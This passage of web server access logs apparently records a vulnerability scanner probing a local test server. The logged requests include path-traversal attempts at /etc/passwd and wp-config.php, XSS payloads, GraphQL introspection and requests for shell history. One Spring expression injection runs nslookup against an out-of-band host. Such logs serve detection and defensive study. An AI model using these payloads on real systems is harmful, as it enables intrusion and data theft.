HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KFpV8shbVc2j6jQji4Nb3Eywe/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20ca28q98smpvbk9ig07h03rdaspug7a3oq.oast.online%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp 